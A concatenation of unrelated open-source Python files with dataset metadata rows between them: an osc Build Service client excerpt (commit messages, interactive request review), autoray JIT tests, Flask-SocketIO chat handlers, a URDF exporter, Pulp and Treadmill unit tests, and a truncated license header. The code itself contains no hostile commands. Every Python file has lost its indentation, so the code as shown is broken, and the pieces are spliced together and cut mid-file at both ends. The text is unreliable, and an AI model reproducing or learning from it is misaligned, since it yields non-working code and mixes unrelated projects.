return template
def parse_diff_for_commit_message(diff, template = []):
date_re = re.compile(r'\+(Mon|Tue|Wed|Thu|Fri|Sat|Sun) ([A-Z][a-z]{2}) ( ?[0-9]|[0-3][0-9]) .*')
diff = diff.split('\n')
# The first four lines contains a header of diff
for line in diff[3:]:
# this condition is magical, but it removes all unwanted lines from commit message
if not(line) or (line and line[0] != '+') or \
date_re.match(line) or \
line == '+' or line[0:3] == '+++':
continue
if line == '+-------------------------------------------------------------------':
template.append('')
else:
template.append(line[1:])
return template
def get_commit_msg(wc_dir, pacs):
template = store_read_file(wc_dir, '_commit_msg')
# open editor for commit message
# but first, produce status and diff to append to the template
footer = []
lines = []
for p in pacs:
states = sorted(p.get_status(False, ' ', '?'), lambda x, y: cmp(x[1], y[1]))
changed = [statfrmt(st, os.path.normpath(os.path.join(p.dir, filename))) for st, filename in states]
if changed:
footer += changed
footer.append('\nDiff for working copy: %s' % p.dir)
footer.extend([''.join(i) for i in p.get_diff(ignoreUnversioned=True)])
lines.extend(get_commit_message_template(p))
if template is None:
if lines and lines[0] == '':
del lines[0]
template = '\n'.join(lines)
msg = ''
# if footer is empty, there is nothing to commit, and no edit needed.
if footer:
msg = edit_message(footer='\n'.join(footer), template=template)
if msg:
store_write_string(wc_dir, '_commit_msg', msg + '\n')
else:
store_unlink_file(wc_dir, '_commit_msg')
return msg
def print_request_list(apiurl, project, package = None, states = ('new', 'review', ), force = False):
"""
prints list of pending requests for the specified project/package if "check_for_request_on_action"
is enabled in the config or if "force" is set to True
"""
if not conf.config['check_for_request_on_action'] and not force:
return
requests = get_request_list(apiurl, project, package, req_state=states)
msg = 'Pending requests for %s: %s (%s)'
if package is None and len(requests):
print(msg % ('project', project, len(requests)))
elif len(requests):
print(msg % ('package', '/'.join([project, package]), len(requests)))
for r in requests:
print(r.list_view(), '\n')
def request_interactive_review(apiurl, request, initial_cmd='', group=None,
ignore_reviews=False, source_buildstatus=False):
"""review the request interactively"""
import tempfile, re
tmpfile = None
def safe_change_request_state(*args, **kwargs):
try:
change_request_state(*args, **kwargs)
return True
except HTTPError as e:
print('Server returned an error:', e, file=sys.stderr)
print('Try -f to force the state change', file=sys.stderr)
return False
def print_request(request):
print(request)
def print_source_buildstatus(src_actions, newline=False):
if newline:
print()
for action in src_actions:
print('%s/%s:' % (action.src_project, action.src_package))
try:
print('\n'.join(get_results(apiurl, action.src_project, action.src_package)))
except HTTPError as e:
if e.code != 404:
raise
print('unable to retrieve the buildstatus: %s' % e)
print_request(request)
print_comments(apiurl, 'request', request.reqid)
try:
prompt = '(a)ccept/(d)ecline/(r)evoke/c(l)one/co(m)ment/(s)kip/(c)ancel > '
editable_actions = request.get_actions('submit', 'maintenance_incident')
# actions which have sources + buildresults
src_actions = editable_actions + request.get_actions('maintenance_release')
if editable_actions:
prompt = 'd(i)ff/(a)ccept/(d)ecline/(r)evoke/(b)uildstatus/c(l)one/(e)dit/co(m)ment/(s)kip/(c)ancel > '
elif src_actions:
# no edit for maintenance release requests
prompt = 'd(i)ff/(a)ccept/(d)ecline/(r)evoke/(b)uildstatus/c(l)one/co(m)ment/(s)kip/(c)ancel > '
editprj = ''
orequest = None
if source_buildstatus and src_actions:
print_source_buildstatus(src_actions, newline=True)
while True:
if initial_cmd:
repl = initial_cmd
initial_cmd = ''
else:
repl = raw_input(prompt).strip()
if repl == 'i' and src_actions:
if not orequest is None and tmpfile:
tmpfile.close()
tmpfile = None
if tmpfile is None:
tmpfile = tempfile.NamedTemporaryFile(suffix='.diff')
try:
diff = request_diff(apiurl, request.reqid)
tmpfile.write(diff)
except HTTPError as e:
if e.code != 400:
raise
# backward compatible diff for old apis
for action in src_actions:
diff = 'old: %s/%s\nnew: %s/%s\n' % (action.src_project, action.src_package,
action.tgt_project, action.tgt_package)
diff += submit_action_diff(apiurl, action)
diff += '\n\n'
tmpfile.write(diff)
tmpfile.flush()
run_editor(tmpfile.name)
print_request(request)
print_comments(apiurl, 'request', request.reqid)
elif repl == 's':
print('skipping: #%s' % request.reqid, file=sys.stderr)
break
elif repl == 'c':
print('Aborting', file=sys.stderr)
raise oscerr.UserAbort()
elif repl == 'm':
comment = edit_text()
create_comment(apiurl, 'request', comment, request.reqid)
elif repl == 'b' and src_actions:
print_source_buildstatus(src_actions)
elif repl == 'e' and editable_actions:
# this is only for editable actions
if not editprj:
editprj = clone_request(apiurl, request.reqid, 'osc editrequest')
orequest = request
request = edit_submitrequest(apiurl, editprj, orequest, request)
src_actions = editable_actions = request.get_actions('submit', 'maintenance_incident')
print_request(request)
prompt = 'd(i)ff/(a)ccept/(b)uildstatus/(e)dit/(s)kip/(c)ancel > '
else:
state_map = {'a': 'accepted', 'd': 'declined', 'r': 'revoked'}
mo = re.search('^([adrl])(?:\s+(-f)?\s*-m\s+(.*))?$', repl)
if mo is None or orequest and mo.group(1) != 'a':
print('invalid choice: \'%s\'' % repl, file=sys.stderr)
continue
state = state_map.get(mo.group(1))
force = mo.group(2) is not None
msg = mo.group(3)
footer = ''
msg_template = ''
if not (state is None or request.state is None):
footer = 'changing request from state \'%s\' to \'%s\'\n\n' \
% (request.state.name, state)
msg_template = change_request_state_template(request, state)
footer += str(request)
if tmpfile is not None:
tmpfile.seek(0)
# the read bytes probably have a moderate size so the str won't be too large
footer += '\n\n' + tmpfile.read()
if msg is None:
try:
msg = edit_message(footer = footer, template=msg_template)
except oscerr.UserAbort:
# do not abort (show prompt again)
continue
else:
msg = msg.strip('\'').strip('"')
if not orequest is None:
request.create(apiurl)
if not safe_change_request_state(apiurl, request.reqid, 'accepted', msg, force=force):
# an error occured
continue
repl = raw_input('Supersede original request? (y|N) ')
if repl in ('y', 'Y'):
safe_change_request_state(apiurl, orequest.reqid, 'superseded',
'superseded by %s' % request.reqid, request.reqid, force=force)
elif state is None:
clone_request(apiurl, request.reqid, msg)
else:
reviews = [r for r in request.reviews if r.state == 'new']
if not reviews or ignore_reviews:
if safe_change_request_state(apiurl, request.reqid, state, msg, force=force):
break
else:
# an error occured
continue
group_reviews = [r for r in reviews if (r.by_group is not None
and r.by_group == group)]
if len(group_reviews) == 1 and conf.config['review_inherit_group']:
review = group_reviews[0]
else:
print('Please chose one of the following reviews:')
for i in range(len(reviews)):
fmt = Request.format_review(reviews[i])
print('(%i)' % i, 'by %(type)-10s %(by)s' % fmt)
num = raw_input('> ')
try:
num = int(num)
except ValueError:
print('\'%s\' is not a number.' % num)
continue
if num < 0 or num >= len(reviews):
print('number \'%s\' out of range.' % num)
continue
review = reviews[num]
change_review_state(apiurl, request.reqid, state, by_user=review.by_user,
by_group=review.by_group, by_project=review.by_project,
by_package=review.by_package, message=msg)
break
finally:
if tmpfile is not None:
tmpfile.close()
def edit_submitrequest(apiurl, project, orequest, new_request=None):
"""edit a submit action from orequest/new_request"""
import tempfile, shutil
actions = orequest.get_actions('submit')
oactions = actions
if new_request is not None:
actions = new_request.get_actions('submit')
num = 0
if len(actions) > 1:
print('Please chose one of the following submit actions:')
for i in range(len(actions)):
# it is safe to use orequest because currently the formatting
# of a submit action does not need instance specific data
fmt = orequest.format_action(actions[i])
print('(%i)' % i, '%(source)s %(target)s' % fmt)
num = raw_input('> ')
try:
num = int(num)
except ValueError:
raise oscerr.WrongArgs('\'%s\' is not a number.' % num)
if num < 0 or num >= len(orequest.actions):
raise oscerr.WrongArgs('number \'%s\' out of range.' % num)
# the api replaced ':' with '_' in prj and pkg names (clone request)
package = '%s.%s' % (oactions[num].src_package.replace(':', '_'),
oactions[num].src_project.replace(':', '_'))
tmpdir = None
cleanup = True
try:
tmpdir = tempfile.mkdtemp(prefix='osc_editsr')
p = Package.init_package(apiurl, project, package, tmpdir)
p.update()
shell = os.getenv('SHELL', default='/bin/sh')
olddir = os.getcwd()
os.chdir(tmpdir)
print('Checked out package \'%s\' to %s. Started a new shell (%s).\n' \
'Please fix the package and close the shell afterwards.' % (package, tmpdir, shell))
run_external(shell)
# the pkg might have uncommitted changes...
cleanup = False
os.chdir(olddir)
# reread data
p = Package(tmpdir)
modified = p.get_status(False, ' ', '?', 'S')
if modified:
print('Your working copy has the following modifications:')
print('\n'.join([statfrmt(st, filename) for st, filename in modified]))
repl = raw_input('Do you want to commit the local changes first? (y|N) ')
if repl in ('y', 'Y'):
msg = get_commit_msg(p.absdir, [p])
p.commit(msg=msg)
cleanup = True
finally:
if cleanup:
shutil.rmtree(tmpdir)
else:
print('Please remove the dir \'%s\' manually' % tmpdir)
r = Request()
for action in orequest.get_actions():
new_action = Action.from_xml(action.to_xml())
r.actions.append(new_action)
if new_action.type == 'submit':
new_action.src_package = '%s.%s' % (action.src_package.replace(':', '_'),
action.src_project.replace(':', '_'))
new_action.src_project = project
# do an implicit cleanup
new_action.opt_sourceupdate = 'cleanup'
return r
def get_user_projpkgs(apiurl, user, role=None, exclude_projects=[], proj=True, pkg=True, maintained=False, metadata=False):
"""Return all project/packages where user is involved."""
xpath = 'person/@userid = \'%s\'' % user
excl_prj = ''
excl_pkg = ''
for i in exclude_projects:
excl_prj = xpath_join(excl_prj, 'not(@name = \'%s\')' % i, op='and')
excl_pkg = xpath_join(excl_pkg, 'not(@project = \'%s\')' % i, op='and')
role_filter_xpath = xpath
if role:
xpath = xpath_join(xpath, 'person/@role = \'%s\'' % role, inner=True, op='and')
xpath_pkg = xpath_join(xpath, excl_pkg, op='and')
xpath_prj = xpath_join(xpath, excl_prj, op='and')
if maintained:
xpath_pkg = xpath_join(xpath_pkg, '(project/attribute/@name=\'%(attr)s\' or attribute/@name=\'%(attr)s\')' % {'attr': conf.config['maintained_attribute']}, op='and')
what = {}
if pkg:
if metadata:
what['package'] = xpath_pkg
else:
what['package_id'] = xpath_pkg
if proj:
if metadata:
what['project'] = xpath_prj
else:
what['project_id'] = xpath_prj
try:
res = search(apiurl, **what)
except HTTPError as e:
if e.code != 400 or not role_filter_xpath:
raise e
# backward compatibility: local role filtering
what = dict([[kind, role_filter_xpath] for kind in what.keys()])
if 'package' in what:
what['package'] = xpath_join(role_filter_xpath, excl_pkg, op='and')
if 'project' in what:
what['project'] = xpath_join(role_filter_xpath, excl_prj, op='and')
res = search(apiurl, **what)
filter_role(res, user, role)
return res
def raw_input(*args):
try:
import builtins
func = builtins.input
except ImportError:
#python 2.7
import __builtin__
func = __builtin__.raw_input
try:
return func(*args)
except EOFError:
# interpret ctrl-d as user abort
raise oscerr.UserAbort()
def run_external(filename, *args, **kwargs):
"""Executes the program filename via subprocess.call.
*args are additional arguments which are passed to the
program filename. **kwargs specify additional arguments for
the subprocess.call function.
if no args are specified the plain filename is passed
to subprocess.call (this can be used to execute a shell
command). Otherwise [filename] + list(args) is passed
to the subprocess.call function.
"""
# unless explicitly specified use shell=False
kwargs.setdefault('shell', False)
if args:
cmd = [filename] + list(args)
else:
cmd = filename
try:
return subprocess.call(cmd, **kwargs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
raise oscerr.ExtRuntimeError(e.strerror, filename)
def return_external(filename, *args, **kwargs):
"""Executes the program filename via subprocess.check_output.
*args are additional arguments which are passed to the
program filename. **kwargs specify additional arguments for
the subprocess.check_output function.
if no args are specified the plain filename is passed
to subprocess.check_output (this can be used to execute a shell
command). Otherwise [filename] + list(args) is passed
to the subprocess.check_output function.
Returns the output of the command.
"""
if args:
cmd = [filename] + list(args)
else:
cmd = filename
try:
return subprocess.check_output(cmd, **kwargs)
except OSError as e:
if e.errno != errno.ENOENT:
raise
raise oscerr.ExtRuntimeError(e.strerror, filename)
# backward compatibility: local role filtering
def filter_role(meta, user, role):
"""
remove all project/package nodes if no person node exists
where @userid=user and @role=role
"""
for kind, root in meta.items():
delete = []
for node in root.findall(kind):
found = False
for p in node.findall('person'):
if p.get('userid') == user and p.get('role') == role:
found = True
break
if not found:
delete.append(node)
for node in delete:
root.remove(node)
def find_default_project(apiurl=None, package=None):
""""
look though the list of conf.config['getpac_default_project']
and find the first project where the given package exists in the build service.
"""
if not len(conf.config['getpac_default_project']):
return None
candidates = re.split('[, ]+', conf.config['getpac_default_project'])
if package is None or len(candidates) == 1:
return candidates[0]
# search through the list, where package exists ...
for prj in candidates:
try:
# any fast query will do here.
show_package_meta(apiurl, prj, package)
return prj
except HTTPError:
pass
return None
def utime(filename, arg, ignore_einval=True):
"""wrapper around os.utime which ignore errno EINVAL by default"""
try:
# workaround for bnc#857610): if filename resides on a nfs share
# os.utime might raise EINVAL
os.utime(filename, arg)
except OSError as e:
if e.errno == errno.EINVAL and ignore_einval:
return
raise
def which(name):
"""Searches "name" in PATH."""
name = os.path.expanduser(name)
if os.path.isabs(name):
if os.path.exists(name):
return name
return None
for directory in os.environ.get('PATH', '').split(':'):
path = os.path.join(directory, name)
if os.path.exists(path):
return path
return None
def get_comments(apiurl, kind, *args):
url = makeurl(apiurl, ('comments', kind) + args)
f = http_GET(url)
return ET.parse(f).getroot()
def print_comments(apiurl, kind, *args):
def print_rec(comments, indent=''):
for comment in comments:
print(indent, end='')
print('(', comment.get('id'), ')', 'On', comment.get('when'), comment.get('who'), 'wrote:')
text = indent + comment.text.replace('\r\n',' \n')
print(('\n' + indent).join(text.split('\n')))
print()
print_rec([c for c in root if c.get('parent') == comment.get('id')], indent + ' ')
root = get_comments(apiurl, kind, *args)
comments = [c for c in root if c.get('parent') is None]
if comments:
print('\nComments:')
print_rec(comments)
def create_comment(apiurl, kind, comment, *args, **kwargs):
query = {}
if kwargs.get('parent') is not None:
query = {'parent_id': kwargs['parent']}
u = makeurl(apiurl, ('comments', kind) + args, query=query)
f = http_POST(u, data=comment)
ret = ET.fromstring(f.read()).find('summary')
return ret.text
def delete_comment(apiurl, cid):
u = makeurl(apiurl, ['comment', cid])
f = http_DELETE(u)
ret = ET.fromstring(f.read()).find('summary')
return ret.text
# vim: sw=4 et
| gpl-2.0 | -316,398,223,788,239,000 | 37.421317 | 364 | 0.551383 | false |
jcmgray/autoray | tests/test_autocompile.py | 1 | 2460 | import pytest
from autoray import do, autojit, infer_backend, to_numpy
from .test_autoray import BACKENDS, gen_rand
from numpy.testing import assert_allclose
BACKENDS = [
p for p in BACKENDS if p.values[0] in ("jax", "torch", "tensorflow")
]
def modified_gram_schmidt(X):
Q = []
for j in range(0, X.shape[0]):
q = X[j, :]
for i in range(0, j):
rij = do("tensordot", do("conj", Q[i]), q, axes=1)
q = q - rij * Q[i]
rjj = do("linalg.norm", q, 2)
Q.append(q / rjj)
return do("stack", tuple(Q), axis=0)
@pytest.fixture
def mgs_case():
x = gen_rand((10, 10), "numpy")
y = modified_gram_schmidt(x)
return x, y
@pytest.mark.parametrize("share_intermediates", [False, True])
@pytest.mark.parametrize("nested", [False, True])
def test_compile_python(mgs_case, share_intermediates, nested):
x, y = mgs_case
compiler_opts = {"python": {"share_intermediates": share_intermediates}}
mgs = autojit(modified_gram_schmidt, compiler_opts=compiler_opts)
if nested:
mgs = autojit(mgs, compiler_opts=compiler_opts)
y2 = mgs(x)
assert_allclose(y, y2)
@pytest.mark.parametrize("backend", BACKENDS)
def test_others_numpy(backend, mgs_case):
x, y = mgs_case
mgs = autojit(modified_gram_schmidt)
y2 = mgs(x, backend=backend)
assert infer_backend(y2) == "numpy"
assert_allclose(y, y2)
@pytest.mark.parametrize("backend", BACKENDS)
def test_autodispatch(backend, mgs_case):
x, y = mgs_case
x = do("array", x, like=backend)
mgs = autojit(modified_gram_schmidt)
y2 = mgs(x, backend=backend)
assert infer_backend(y2) == backend
assert_allclose(y, to_numpy(y2))
def test_complicated_signature():
@autojit
def foo(a, b, c):
a1, a2 = a
b1 = b['1']
c1, c2 = c['sub']
return do('sum', do('stack', (a1, a2, b1, c1, c2)), axis=0)
x = do('random.uniform', size=(5, 7), like='numpy')
y = foo((x[0, :], x[1, :]), {'1': x[2, :]}, c={'sub': (x[3, :], x[4, :])})
assert_allclose(y, x.sum(0))
def test_static_kwargs_change():
@autojit
def foo(a, b, c):
if c == 'sum':
return a + b
elif c == 'sub':
return a - b
assert foo(do('array', 100, like='numpy'),
do('array', 1, like='numpy'), 'sum') == 101
assert foo(do('array', 100, like='numpy'),
do('array', 1, like='numpy'), 'sub') == 99
| apache-2.0 | 5,361,797,290,353,655,000 | 26.333333 | 78 | 0.576016 | false |
send2zhao/boilerplate | flack/events.py | 2 | 2062 | from flask import g, session
from . import db, socketio, celery
from .models import User, Message
from .auth import verify_token
def push_model(model):
"""Push the model to all connected Socket.IO clients."""
socketio.emit('updated_model', {'class': model.__class__.__name__,
'model': model.to_dict()})
@socketio.on('ping_user')
def on_ping_user(token):
"""Clients must send this event periodically to keep the user online."""
verify_token(token, add_to_session=True)
if g.current_user:
# Mark the user as still online
g.current_user.ping()
@celery.task
def post_message(user_id, data):
"""Celery task that posts a message."""
from .wsgi_aux import app
with app.app_context():
user = User.query.get(user_id)
if user is None:
return
# Write the message to the database
msg = Message.create(data, user=user, expand_links=False)
db.session.add(msg)
db.session.commit()
# broadcast the message to all clients
push_model(msg)
if msg.expand_links():
db.session.commit()
# broadcast the message again, now with links expanded
push_model(msg)
# clean up the database session
db.session.remove()
@socketio.on('post_message')
def on_post_message(data, token):
"""Clients send this event to when the user posts a message."""
verify_token(token, add_to_session=True)
if g.current_user:
post_message.apply_async(args=(g.current_user.id, data))
@socketio.on('disconnect')
def on_disconnect():
"""A Socket.IO client has disconnected. If we know who the user is, then
update our state accordingly.
"""
nickname = session.get('nickname')
if nickname:
# we have the nickname in the session, we can mark the user as offline
user = User.query.filter_by(nickname=nickname).first()
if user:
user.online = False
db.session.commit()
push_model(user)
| mit | 6,596,085,107,764,467,000 | 28.457143 | 78 | 0.621242 | false |
rdeits/director | src/python/ddapp/affordanceurdf.py | 6 | 2352 | from ddapp import transformUtils
from ddapp import affordanceitems
from urdf_parser_py import urdf
def geometryFromAffordance(aff):
if isinstance(aff, affordanceitems.SphereAffordanceItem):
radius = aff.getProperty('Radius')
return urdf.Sphere(radius=radius)
if isinstance(aff, affordanceitems.BoxAffordanceItem):
dimensions = aff.getProperty('Dimensions')
return urdf.Box(size=dimensions)
if isinstance(aff, affordanceitems.CylinderAffordanceItem):
return urdf.Cylinder(length=aff.getProperty('Length'), radius=aff.getProperty('Radius'))
if isinstance(aff, affordanceitems.CapsuleAffordanceItem):
return urdf.Cylinder(length=aff.getProperty('Length'), radius=aff.getProperty('Radius'))
if isinstance(aff, affordanceitems.CapsuleRingAffordanceItem):
raise Exception('not supported yet')
if isinstance(aff, affordanceitems.MeshAffordanceItem):
filename = aff.getProperty('Filename')
filename = affordanceitems.MeshAffordanceItem.getMeshManager().getFilesystemFilename(filename)
return urdf.Mesh(filename=filename, scale=[1.0, 1.0, 1.0])
def stringWithAffordanceId(inputStr, aff):
return inputStr % aff.getProperty('uuid')
def colorFromAffordance(aff):
color = aff.getProperty('Color')
return urdf.Color(color[0], color[1], color[2] ,1)
def materialFromAffordance(aff):
color = colorFromAffordance(aff)
return urdf.Material(name=stringWithAffordanceId('material_%s', aff), color=color, texture=None)
def poseFromAffordance(aff):
t = aff.getChildFrame().transform
position, quat = transformUtils.poseFromTransform(t)
rpy = transformUtils.rollPitchYawFromTransform(t)
return urdf.Pose(position, rpy)
def linkFromAffordance(aff):
geometry = geometryFromAffordance(aff)
material = materialFromAffordance(aff)
pose = poseFromAffordance(aff)
visual = urdf.Visual(geometry=geometry, material=material, origin=pose)
collision = urdf.Collision(geometry=geometry, origin=pose)
return urdf.Link(name=stringWithAffordanceId('link_%s', aff), visual=visual, collision=collision)
def urdfStringFromAffordances(affordanceList):
r = urdf.Robot(name='affordance_environment')
for aff in affordanceList:
r.add_link(linkFromAffordance(aff))
return r.to_xml_string()
| bsd-3-clause | 7,587,478,557,699,453,000 | 33.588235 | 102 | 0.741922 | false |
mibanescu/pulp | client_admin/test/unit/test_admin_exception_handler.py | 15 | 5327 | import mock
from pulp.bindings import exceptions as bindings_exceptions
from pulp.client.admin.exception_handler import AdminExceptionHandler
from pulp.client.extensions import exceptions
from pulp.client.extensions.core import TAG_FAILURE, TAG_PARAGRAPH
from pulp.common import auth_utils
from pulp.devel.unit import base
class AdminExceptionHandlerTests(base.PulpClientTests):
def setUp(self):
super(AdminExceptionHandlerTests, self).setUp()
self.handler = AdminExceptionHandler(self.prompt, self.config)
def test_handle_authentication_failed(self):
# Test
self.handler._handle_authentication_failed()
# Verify
self.assertTrue('Authentication' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
self.assertTrue('certificate' in self.recorder.lines[2]) # skip blank line
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
def test_handle_permission_error(self):
# Test
self.handler._handle_permission_error()
# Verify
self.assertTrue('Permissions' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
self.assertTrue('appropriate permissions' in self.recorder.lines[2]) # skip blank line
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
def test_handle_invalid_username(self):
# Test
self.handler._handle_invalid_username()
# Verify
self.assertTrue('Invalid Username' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
def test_handle_unknown(self):
# Test
self.handler._handle_unknown()
# Verify
self.assertTrue('Unknown' in self.recorder.lines[0])
self.assertEqual(TAG_FAILURE, self.prompt.get_write_tags()[0])
self.assertTrue('server log' in self.recorder.lines[2]) # skip blank line
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
def test_handle_expired_client_cert(self):
# Test
e = bindings_exceptions.ClientCertificateExpiredException('x')
code = self.handler.handle_expired_client_cert(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(TAG_PARAGRAPH, self.prompt.get_write_tags()[1])
self.assertTrue('session certificate' in self.recorder.lines[2])
class AdminExceptionHandlerDispatchingTests(base.PulpClientTests):
def setUp(self):
super(AdminExceptionHandlerDispatchingTests, self).setUp()
# Mock out all of the handling methods, we're just testing to see that the
# dispatching from error code to handle method is correct
self.handler = AdminExceptionHandler(self.prompt, self.config)
self.handler._handle_authentication_failed = mock.MagicMock()
self.handler._handle_invalid_username = mock.MagicMock()
self.handler._handle_permission_error = mock.MagicMock()
self.handler._handle_unknown = mock.MagicMock()
def test_handle_code_failed(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_FAILED)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_authentication_failed.call_count, 1)
def test_handle_code_permission(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_PERMISSION)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_permission_error.call_count, 1)
def test_handle_code_invalid_ssl_cert(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_INVALID_SSL_CERT)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_authentication_failed.call_count, 1)
def test_handle_code_username(self):
# Setup
response_doc = auth_utils.generate_failure_response(auth_utils.CODE_USER_PASS)
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_invalid_username.call_count, 1)
def test_handle_code_unknown(self):
# Setup
response_doc = auth_utils.generate_failure_response('foo')
e = bindings_exceptions.PermissionsException(response_doc)
# Test
code = self.handler.handle_permission(e)
# Verify
self.assertEqual(code, exceptions.CODE_PERMISSIONS_EXCEPTION)
self.assertEqual(self.handler._handle_unknown.call_count, 1)
| gpl-2.0 | -7,532,193,940,021,664,000 | 37.601449 | 95 | 0.689131 | false |
bretttegart/treadmill | tests/services/cgroup_service_test.py | 1 | 6817 | """Unit test for cgroup_service - Treadmill cgroup service.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import os
import tempfile
import unittest
import select
import shutil
# Disable W0611: Unused import
import tests.treadmill_test_skip_windows # pylint: disable=W0611
import mock
import treadmill
from treadmill import services
from treadmill.services import cgroup_service
class CGroupServiceTest(unittest.TestCase):
"""Unit tests for the cgroup service implementation.
"""
def setUp(self):
self.root = tempfile.mkdtemp()
self.cgroup_svc = os.path.join(self.root, 'cgroup_svc')
self.running = os.path.join(self.root, 'running')
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
def test_initialize(self):
"""Test service initialization.
"""
svc = cgroup_service.CgroupResourceService(self.running)
svc.initialize(self.cgroup_svc)
def test_report_status(self):
"""Test processing of status request.
"""
svc = cgroup_service.CgroupResourceService(self.running)
status = svc.report_status()
self.assertEqual(
status,
{'ready': True}
)
def test_event_handlers(self):
"""Test event_handlers request.
"""
svc = cgroup_service.CgroupResourceService(self.running)
handlers = svc.event_handlers()
self.assertEqual(
handlers,
[]
)
@mock.patch('treadmill.cgroups.create', mock.Mock())
@mock.patch('treadmill.cgroups.get_value', mock.Mock(return_value=10000))
@mock.patch('treadmill.cgroups.inherit_value', mock.Mock())
@mock.patch('treadmill.cgroups.join', mock.Mock())
@mock.patch('treadmill.cgroups.set_value', mock.Mock())
@mock.patch('treadmill.services.cgroup_service.CgroupResourceService.'
'_register_oom_handler', mock.Mock())
def test_on_create_request(self):
"""Test processing of a cgroups create request.
"""
# Access to a protected member _register_oom_handler of a client class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
request = {
'memory': '100M',
'cpu': '100%',
}
request_id = 'myproid.test-0-ID1234'
svc.on_create_request(request_id, request)
cgrp = os.path.join('treadmill/apps', request_id)
svc._register_oom_handler.assert_called_with(cgrp, request_id)
treadmill.cgroups.create.assert_has_calls(
[
mock.call(ss, cgrp)
for ss in ['cpu', 'cpuacct', 'cpuset', 'memory', 'blkio']
]
)
# Memory calculation:
#
# (demand * virtual cpu bmips / total bmips) * treadmill.cpu.shares
# (100% * 5000 / (24000 * 0.9 ) * 10000) = 2314
treadmill.cgroups.set_value.assert_has_calls([
mock.call('blkio', cgrp, 'blkio.weight', 100),
mock.call('memory', cgrp, 'memory.soft_limit_in_bytes', '100M'),
mock.call('memory', cgrp, 'memory.limit_in_bytes', '100M'),
mock.call('memory', cgrp, 'memory.memsw.limit_in_bytes', '100M'),
mock.call('cpu', cgrp, 'cpu.shares',
treadmill.sysinfo.BMIPS_PER_CPU)
])
treadmill.cgroups.inherit_value.assert_has_calls([
mock.call('cpuset', cgrp, 'cpuset.cpus'),
mock.call('cpuset', cgrp, 'cpuset.mems')
])
@mock.patch('treadmill.cgutils.delete', mock.Mock())
@mock.patch('treadmill.services.cgroup_service.CgroupResourceService.'
'_unregister_oom_handler', mock.Mock())
def test_on_delete_request(self):
"""Test processing of a cgroups delete request.
"""
# Access to a protected member _unregister_oom_handler of a client
# class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
request_id = 'myproid.test-0-ID1234'
svc.on_delete_request(request_id)
cgrp = os.path.join('treadmill/apps', request_id)
treadmill.cgutils.delete.assert_has_calls(
[
mock.call(ss, cgrp)
for ss in ['cpu', 'cpuacct', 'cpuset', 'memory', 'blkio']
]
)
svc._unregister_oom_handler.assert_called_with(cgrp)
@mock.patch('treadmill.cgutils.get_memory_oom_eventfd',
mock.Mock(return_value='fake_efd'))
def test__register_oom_handler(self):
"""Test registration of OOM handler.
"""
# Access to a protected member _register_oom_handler of a client class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
registered_handlers = svc.event_handlers()
self.assertNotIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
cgrp = 'treadmill/apps/myproid.test-42-ID1234'
svc._register_oom_handler(cgrp, 'myproid.test-42-ID1234')
treadmill.cgutils.get_memory_oom_eventfd.assert_called_with(cgrp)
registered_handlers = svc.event_handlers()
self.assertIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
@mock.patch('os.close', mock.Mock())
@mock.patch('treadmill.cgutils.get_memory_oom_eventfd',
mock.Mock(return_value='fake_efd'))
def test__unregister_oom_handler(self):
"""Test unregistration of OOM handler.
"""
# Access to a protected member _unregister_oom_handler of a client
# class
# pylint: disable=W0212
svc = cgroup_service.CgroupResourceService(self.running)
cgrp = 'treadmill/apps/myproid.test-42-ID1234'
svc._register_oom_handler(cgrp, 'myproid.test-42-ID1234')
registered_handlers = svc.event_handlers()
self.assertIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
svc._unregister_oom_handler(cgrp)
registered_handlers = svc.event_handlers()
self.assertNotIn(
('fake_efd', select.POLLIN, mock.ANY),
registered_handlers
)
os.close.assert_called_with('fake_efd')
def test_load(self):
"""Test loading service using alias."""
# pylint: disable=W0212
self.assertEqual(
cgroup_service.CgroupResourceService,
services.ResourceService(self.root, 'cgroup')._load_impl()
)
if __name__ == '__main__':
unittest.main()
| apache-2.0 | 7,435,463,282,362,125,000 | 33.256281 | 78 | 0.603638 | false |
GaloisInc/hacrypto | src/Tools/FigureOfMerit/FigureOfMerit/BlockCiphers/Scenario2/SelectedCipher.py | 1 | 18374 | #
# University of Luxembourg
# Laboratory of Algorithmics, Cryptology and Security (LACS)
#
# FigureOfMerit (FOM)
#
# Copyright (C) 2015 University of Luxembourg
#
# Written in 2015 by Daniel Dinu <[email protected]>
#
# This file is part of FigureOfMerit.
#
# This program is free software: you can redistribute it and/or modify
